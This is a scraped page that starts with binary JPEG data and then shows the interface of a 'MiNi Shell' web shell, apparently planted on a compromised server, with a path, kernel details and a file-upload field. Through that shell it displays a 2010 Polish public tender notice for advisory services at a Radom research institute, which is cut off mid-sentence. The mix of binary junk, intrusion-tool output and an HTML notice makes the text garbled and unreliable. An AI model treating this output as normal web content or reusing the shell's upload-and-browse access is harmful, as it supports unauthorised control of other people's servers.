JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101125/382410-N-2010.html

<p class="kh_header"><b>Radom: Usługi doradcze w ramach projektu Wspieranie powiązań i rozwoju produktów branży AGD współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Działania 5.1. Programu Operacyjnego Innowacyjna Gospodarka 2007-2013.</b><br>
<b>Numer ogłoszenia: 382410 - 2010; data zamieszczenia: 25.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Energetyki Oddział Techniki Grzewczej i Sanitarnej w Radomiu , ul. Wilcza 8, 26-610 Radom, woj. mazowieckie, tel. 48 362 44 01, faks 48 363 45 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> itgs@itgs.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi doradcze w ramach projektu Wspieranie powiązań i rozwoju produktów branży AGD współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Działania 5.1. Programu Operacyjnego Innowacyjna Gospodarka 2007-2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa doradcza jest przeznaczona dla Lidera Powiązania Kooperacyjnego Branży AGD-RTV oraz pośrednio Członków tego powiązania. Usługa ma za zadanie wsparcie Lidera Powiązania w realizacji projektu z zakresu systemów, badań odbiorczych oprogramowania systemowego, integracji oprogramowania i urządzeń komputerowych zgodnie z założeniami projektowymi oraz w zakresie praw autorskich do oprogramowania, a także założenia funkcjonalności produktowej AGD-RTV, systemów przemysłowych, założeń procesowo logistycznych, składowania, GDS, łańcucha dostaw, produkcyjne, naukowo-badawcze i jednocześnie wsparcie założeń do zagadnień związanych z Członkami Powiązania Kooperacyjnego z zakresu realizacji projektu indywidualnej platformy klienckiej, efektywności organizacyjno-biznesowej. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 5 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.22.00.00-3, 79.12.11.00-9, 73.30.00.00-5, 79.14.00.00-7, 73.12.00.00-9, 73.21.00.00-7, 73.22.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości: 5000 PLN, słownie: pięć tysięcy złotych. Wadium obejmuje cały okres związania ofertą i może być wniesione w jednej formie: w pieniądzu za pomocą przelewu bankowego na konto Zamawiającego podane poniżej:
 Konto Bankowe: KB S.A. II O Radom Nr  49 150016471216400486730000
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759), spełniają warunki i wymagania określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759). Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają oboiązek ich stosowania, a w szczególności w przypadku prowadzenia działalności gospodarczej, na podstawie Ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej (2004r. Dz. U. Nr 173, poz. 1807, Nr 281, poz. 2777 2005 r. Dz. U. Nr 33, poz. 289, Nr 94, poz. 788, Nr 143, poz. 1199, Nr 175, poz. 1460, Nr 177, poz. 1468, Nr 178, poz. 1480, Nr 179, poz. 1485, Nr 180, poz. 1494, Nr 183, poz. 1538 2006 r. Dz. U. Nr 17, poz. 127, Nr 144, poz. 1043 i 1045, Nr 158, poz. 1121, Nr 171, poz. 1225, Nr 225, poz. 1636, Nr 235, poz. 1699 2007 r. Dz. U. Nr 120, poz. 818 z późniejszymi zmianami) wykonują określoną działalność na bazie stosownego wpisu do Rejestru Przedsiębiorców lub Wpisu do Ewidencji Działalności Gospodarczej w zakresie usług:
PKD 2004 73.10.G Prace Badawczo-Rozwojowe w dziedzinie nauk technicznych lub równoważny w ramach PKD 2007 72.19.Z. 
PKD 2004 74.14.A Doradztwo w zakresie prowadzenia działalności gospodarczej i zarządzania lub równoważny w ramach PKD 2007 70.22.Z.
PKD 2004 72.22.Z Działalność w zakresie oprogramowania lub równoważny w ramach PKD 2007 62.01.Z
PKD 2004 72.21.Z Działalność edycyjna w zakresie oprogramowania lub równoważny w ramach PKD 2007 58.29.Z
PKD 2004 72.60.Z Działalność związana z informatyką, pozostała lub równoważny w ramach PKD 2007 62.02.Z</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3. Opis sposobu dokonywania oceny spełniania tego warunku
3a) Usług doradczych w zakresie tematycznym: 
- Prowadzenie Auditu Technologicznego i 
- Wdrażania pozyskanych Technologii oraz Własnych Innowacyjnych Rozwiązań Technologicznych i
- Realizacja Planów Rozwoju Przedsiębiorstwa lub Technologii i 
- Prowadzenie prac w zakresie Innowacji i Nowych Technologii i 
- Prowadzenie usług wdrożeniowych Systemów Zarządzania Jakością.
3b) Udokumentowanego doświadczenia uczestniczenia w prowadzeniu szkoleń finansowanych ze środków unii europejskiej w zakresie kompetencji tematycznej:
- Benchmarking, 
- Zwiększenie konkurencyjności przedsiębiorstw branży elektronicznej i/lub  Rynek produktów elektronicznych w warunkach globalizacji,
- Zarządzanie logistycznym łańcuchem dostaw i/lub Logistyka, jako narzędzie poprawy konkurencyjności,
- Wymagania i Normy Dotyczące Metrologii,
- Zarządzanie projektami i/lub Zarządzanie Sprzedażą.
3c) usług doradczych w ramach prowadzonych Projektów nie finansowanych ze środków unii europejskiej, na rzecz Przedsiębiorstwa/Przedsiębiorstw prowadzących dystrybucję artykułów gospodarstwa domowego, w którym ilość indeksów asortymentowych przekracza ponad 1300 indeksów i wartość przychodów rocznych nie jest mniejsza niż 30 mln zł. 
3d) posiadanie udokumentowanego doświadczenia w zakresie prowadzenia usług doradczych strategicznych, jakościowych, logistycznych na rzecz, co najmniej jednego Przedsiębiorstwa z branży AGD (Artykuły Gospodarstwa Domowego) o obrotach rocznych nie mniejszych niż 45mln zł, w łańcuchu dostaw umiejscowionego w roli ogólnopolskiego dystrybutora lub producenta, posiadającego, co najmniej jeden salon sprzedaży detalicznej i u którego zakres produktów AGD stanowi, co najmniej 90%-towy udział w obrotach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Uprawnienia konsultanta (osób-osoby) zdolnej do wykonania zamówienia: co najmniej jeden z konsultantów powinien mieć spełnione następujące warunki łączne (Punkt 4, Podpunkt1, Ustęp 1a, 1b, 1c, 1d, 1e, 1f) wymienione poniżej:
1a).  W grupie-Certyfikaty
a) posiadać certyfikat auditora wiodącego (lead Auditor) w zakresie ISO 9000 i BS - 7799 (lub równoważnej np. ISO-IEC 17799, ISO 27001, normy Zarządzania Bezpieczeństwem Informacji);
b) posiadać, co najmniej ukończone z wynikiem pozytywnym, szkolenie Europejskiego Systemu Certyfikacji Logistyków  (ELA-ECBL) lub równoważny certyfikat ELA-ECBL lub ukończone studia podyplomowe w powyższym zakresie.  
c) posiadać Certyfikat Europejskiego Konsultanta lub równoważny potwierdzający kompetencje w zakresie Środków Unijnych. 
1b). W grupie-Kompetencja do realizacja usług doradczych.
a) posiadać stosowne doświadczenie w realizacji usług doradczych PHARE i SPO WKP lub równoważnych tematycznie kompetencji, poprzez otrzymanie akredytacji w Polskiej Agencji Rozwoju Przedsiębiorczości (lub równoważnej agencji rządowej) w zakresie:
- Audit Technologiczny i 
- Innowacje i Nowe Technologie i
- Plan Rozwoju Przedsiębiorstwa i Technologii i-lub
- Wdrażanie pozyskanych Technologii oraz Własnych Innowacyjnych Rozwiązań Technologicznych i
- Jakość. 
b) posiadać doświadczenia realizowane w ramach zadań monitoringu lub usług doradczych, poprzez akredytację-uprawnienia-uczestnictwo w zakresie auditu lub doradztwa lub monitoringu, nadaną przez jednostkę rządową w randze ministerstwa na bazie stosownego rozporządzenia ministra.
1c).  W grupie-Doświadczenie uczestnictwa w projektach podobnych kompetencyjnie do przedmiotu zamówienia.
a) posiadać stosowne doświadczenie w zakresie Grup Roboczych EDI lub równoważnych w zakresie tworzenia standardów norm o charakterze, co najmniej ogólnopolskim i prowadzonego przez Instytut Naukowo-Badawczy lub jednostkę równoważną.
b) posiadać stosowne udokumentowane doświadczenia konsorcjalne uczestnictwa w projekcie naukowo-badawczym finansowanych z Funduszy Unijnych (6 Ramowy, 7 Ramowy) lub źródeł międzynarodowych o charakterze równoważnym. 
c) posiadać udokumentowane doświadczenie w realizacji usług na rzecz: Jednostek badawczo-rozwojowych lub Placówek Naukowych Polskiej Akademii Nauk lub jednostek organizacyjnych posiadających status jednostki badawczo-rozwojowej (jednostki naukowej w rozumieniu art. 2 pkt 9 lit a-f Ustawy z dnia 8 października 2004 r. o zasadach finansowania nauki (Dz.U. z 2008 r. Nr 169 poz. 1049 z późniejszymi zmianami lub międzynarodowych instytutów naukowych utworzonych na podstawie równoważnych odrębnych przepisów).
1d).  W grupie-Doświadczenie w branży AGD-RTV, której to zagadnienia są przedmiotem usług doradczych.
a) posiadanie doświadczenia w branży AGD-RTV, poprzez prowadzenie działalności handlowej lub serwisowej lub doradczej wyrażonej otrzymaniem akredytacji lub certyfikacji lub umowy ramowej, zatwierdzone lub nadane, przez co najmniej jedną z korporacji o światowym zasięgu branży AGD-RTV o obrotach w 2009 roku nie mniejszych niż 10mld Euro.
b) posiadanie udokumentowanego doświadczenia auditora lub doradcy, w zakresie prowadzenia usług doradczych strategicznych, jakościowych, logistycznych na rzecz, co najmniej jednego Przedsiębiorstwa z branży AGD (Artykuły Gospodarstwa Domowego) o obrotach rocznych nie mniejszych niż 45mln zł, w łańcuchu dostaw umiejscowionego w roli ogólnopolskiego dystrybutora lub producenta posiadającego, co najmniej jeden salon sprzedaży detalicznej i u którego zakres produktów AGD stanowi, co najmniej 90%-towy udział w obrotach.
1e).  W grupie-Szkolenia, których tematyka i merytoryka powstającej dokumentacji jest przedmiotem usługi niniejszego doradztwa
a) Posiadać udokumentowane doświadczenie w prowadzeniu szkoleń w roli trenera, finansowanych ze środków unii europejskiej na bazie zamówień udzielonych i akredytowanych przez Polską Agencję Rozwoju Przedsiębiorczości w zakresie kompetencji tematycznej:
- Benchmarking,
- Zwiększenie konkurencyjności przedsiębiorstw branży elektronicznej i-lub Rynek produktów elektronicznych w warunkach globalizacji,
- Zarządzanie logistycznym łańcuchem dostaw i-lub Logistyka jako narzędzie poprawy konkurencyjności,
- Wymagania i Normy Dotyczące Metrologii,
- Zarządzanie projektami i-lub Zarządzanie Sprzedażą.
b) Posiadać ukończone szkolenie w zakresie tematycznym Prawo Zamówień Publicznych.
1f).  W grupie-Doświadczenie w zarządzaniu
a) powinien posiadać udokumentowane, co najmniej roczne doświadczenie członka zarządu i-lub członka rady nadzorczej, i-lub  
b) Powinien wykonywać usługi doradcze w ramach zarządzania, prowadzonych projektów nie finansowanych ze środków unii europejskiej, na rzecz Przedsiębiorstwa-Przedsiębiorstw prowadzących dystrybucję ogólnopolską artykułów gospodarstwa domowego, w którym ilość indeksów asortymentowych przekracza ponad 1300 indeksów i wartość przychodów nie jest mniejsza niż 30 mln zł i-lub
c) powinien mieć doświadczenie bycia uczestnikiem organu doradczego Rady Powiązania Kooperacyjnego (Klastrowego) lub Rady Organizacji lub Rady Zrzeszenia lub Rady Naukowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 1</li>
<li>2 - Ze względów technicznych kryteria oceny ofert zostały umieszczone w części informacje dodatkowe pkt IV.4.16) ogłoszenia - 2</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość dokonywania nieistotnych zmian zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy.
2. Zamawiający, przewiduje również następujące możliwości dokonania istotnej zmiany zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1) zmiany terminu realizacji przedmiotu umowy:  
a) będące następstwem zmian w umowie o dofinansowanie ze środków unijnych projektu dla Działania 5.1 Innowacyjna Gospodarka, a w szczególności harmonogramie realizacji;
b) Zmiany będącej następstwem wystąpienia tzw. Siły Wyższej;
c) zmiany będące następstwem działania organów administracji.
2) Zmiany w przedmiocie zamówienia wskazanego w umowie, w szczególności:
a) będące następstwem zmian w umowie o dofinansowanie ze środków unijnych projektu dla Działania 5.1 Innowacyjna Gospodarka, a w szczególności harmonogramie realizacji;
b) pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie  kosztów eksploatacji wykonanego przedmiotu umowy, przyspieszenie terminu realizacji umowy;
c) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.
3) Zmiany stanu prawnego:
a) Nie dotyczy.
4) Zmiany osobowe:
a) zmiana osób, przy pomocy, których Wykonawca realizuje przedmiot umowy, na inne legitymujące się, co najmniej równoważnym doświadczeniem i uprawnieniami, które wymagane były przez Zamawiającego w ogłoszeniu i SIWZ.
5) Zmiany podwykonawców:
a) rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy, o ile posłużenie się podwykonawcą doprowadzi do skrócenia terminu wykonania przedmiotu umowy, zmniejszenia należnego Wykonawcy wynagrodzenia lub zastosowania przy wykonaniu przedmiotu umowy bardziej zaawansowanych rozwiązań technologicznych w porównaniu do wskazanych w SIWZ,
b) zmiana podmiotu, który uczestniczy w realizacji części zamówienia, jako podwykonawca, na którego potencjale opierał się Wykonawca składając ofertę, będzie możliwa, ale jedynie pod warunkiem, że nowy podmiot wykaże spełnienie warunków udziału w postępowaniu, które wymagane były przez Zamawiającego w ogłoszeniu i SIWZ, 
5) Pozostałe zmiany: 
a) zmiana obowiązującej stawki VAT na podstawie wejścia stosownych Ustaw i Rozporządzeń. Jeśli zmiana stawki VAT będzie powodować zmianę ceny brutto zamówienia i cenę jednostkową wykonywanych usług doradczych, 
b) zmiany, które mogą  wynikać z harmonogramu zadaniowo-finansowego lub ustalonego budżetu lub wskaźników produktu lub wskaźników rezultatu, które to dane są podstawą finansowania lub rozliczenia przy udziale środków unijnych Działania 5.1 Zamawiającego..
c) innych zmian projektowych, dynamiki realizacji usług lub wyników i nieskuteczności lub częstotliwości naprawy uchybień ze strony Wykonawcy.
6) Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Powyższe zmiany do umowy winny być wprowadzone poprzez zmianę do kontraktu lub zmianę w formie aneksu. Nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> itgs@itgs.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego, po złożeniu pisemnego wniosku o wydanie SIWZ.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2010 godzina 12:00, miejsce: Instytut Energetyki Oddział Techniki Grzewczej i Sanitarnej w Radomiu ul. Wilcza 8 26-610 Radom (sekretariat p. 233).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Projekt  Wspieranie powiązań i rozwoju produktów branży AGD współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Działania 5.1. Programu Operacyjnego Innowacyjna Gospodarka 2007-2013. II. Kryteria oceny ofert: 1. Cena (90 pkt); 2. Wykonanie z pozytywnym skutkiem jakościowym wdrożenia w zakresie ISO 9000 (5pkt) i wykonanie z pozytywnym skutkiem jakościowym wdrożenia wg normy BS - 7799 (lub równoważnej np. ISO-IEC 17799, ISO 27001, normy Zarządzania Bezpieczeństwem Informacji) (5pkt); 3. Wykonanie z pozytywnym skutkiem usług doradztwa, których wynikiem jakościowym są zakończone wdrożenia, systemu oprogramowania Magazynu Wysokiego Składowania w łańcuchu dostaw, opartego na najnowszych rozwiązaniach technologicznych normy obiegu dokumentów elektronicznych EDI. Za każde wdrożone oprogramowanie WMS przyznawane jest (10pkt); 4. Wykonanie z pozytywnym skutkiem jakościowym doradztwa na rzecz Instytucji Naukowo-Badawczych ((czyli jednostki naukowej w rozumieniu art. 2 pkt 9 lit a-f Ustawy z dnia 8 października 2004 r. o zasadach finansowania nauki (Dz. U. z 2008 r. Nr 169 poz. 1049 z późniejszymi zmianami)) lub międzynarodowych instytutów naukowych utworzonych na podstawie równoważnych odrębnych przepisów) w okresie 3 lat, których wynikiem jest odbiór prac, a tym samym osiągniecie potwierdzonego obrotu. Za każde 50 000zł przyznawane jest (10pkt); 5. Wykonanie analizy rynku gospodarczego lub branżowego na rzecz Instytucji Naukowo-Badawczych ((czyli jednostki naukowej w rozumieniu art. 2 pkt 9 lit a-f Ustawy z dnia 8 października 2004 r. o zasadach finansowania nauki (Dz. U. z 2008 r. Nr 169 poz. 1049 z późniejszymi zmianami)) lub międzynarodowych instytutów naukowych utworzonych na podstawie równoważnych odrębnych przepisów) lub GUS lub Ministerstwa lub Jednostek Samorządu Terytorialnego zakończone jakościowym przyjęciem prac potwierdzonych wypłatą stosownego wynagrodzenia (20 pkt); 6. Jakościowe wykonanie usług doradztwa projektowo-wdrożeniowych w zakresie prowadzenia usług doradczych strategicznych, jakościowych, logistycznych, których efektem-skutkiem jest powstanie zintegrowanej sieci sprzedaży-usług na zasadzie franchisingu lub równoważnej grupy zrzeszonej pod wspólnym logo handlowym. Za każdy efekt jakościowy wdrożenia usług, wyrażony w postaci mierzalnej, skutecznego powstania grupy o której mowa powyżej otrzyma (5pkt); 7. Jakościowa opinia wykonania usług w postaci prowadzenia szkoleń w zakresach tematycznych Benchmarking (2,5pkt), i-lub Zwiększenie konkurencyjności przedsiębiorstw branży elektronicznej (2,5pkt) i-lub Rynek produktów elektronicznych w warunkach globalizacji (2,5pkt) i-lub Zarządzanie logistycznym łańcuchem dostaw (2,5pkt) i-lub Logistyka, jako narzędzie poprawy konkurencyjności (2,5pkt) i-lub Wymagania i Normy Dotyczące Metrologii (2,5pkt) i-lub Zarządzanie projektami (2,5pkt) i-lub Zarządzanie 